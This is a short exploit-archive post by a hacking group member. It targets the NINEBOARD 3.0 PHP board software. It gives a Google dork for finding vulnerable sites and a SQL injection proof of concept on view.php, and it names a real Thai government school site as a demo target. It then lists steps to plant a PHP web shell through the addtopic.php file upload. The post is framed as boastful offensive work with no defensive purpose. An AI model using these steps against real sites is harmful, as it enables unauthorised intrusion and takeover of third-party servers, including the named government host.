NINEBOARD 3.0 <= SQLi & Upload Vulnerabelity

2011-08-22T00:00:00
ID 1337DAY-ID-16751
Type zdt
Reporter HashoR
Modified 2011-08-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================================================
 
Web             : ashiyane.org	

e-mail          : KaFaran [DOT] Bi [DOT] Edeaa [AT] Gmail.Com              

                      #########################################
                       I'm HashoR , member from ashiyane.org
                            -!We Love KurDestaN!- 
                      #########################################	

================================================================================
 ------|-------------------------------------------------------|------
####
# Exploit Title: NINEBOARD 3.0 <= SQLi & Upload Vulnerabelity
# Author: Ashiyane Digital Security Team - HashoR 
# E-mail: KaFaran [DOT] Bi [DOT] Edeaa [AT] Gmail.Com 
# Category:: webapps
# Google Drok: intitle:"NINEBOARD 3.0"
# Tested on: [LinuX]
####
# ExPLo!T:
>>>1
# htt://site.th/nineboard/view.php?id=2260'
# Demo: http://www.sisaketedu1.go.th/nineboard/view.php?id=2259'
>>>2
[+] Step1: Create account 
[+] Step2: Login To site 
[+] Step3: G0 T0 http://www.site.th/nineboard/addtopic.php
[+] Step4: upload File , sh3ll_hashor_ev!L.php 
[+] LoL.......
#     
• We Will Never Stop Hacking
                           • Its not a game
                                            • It's Our Job
                              enjoy!        
||> Special Greeting To: All members in Ashiyane.org

####
 ------|-------------------------------------------------------|------



#  0day.today [2018-04-04]  #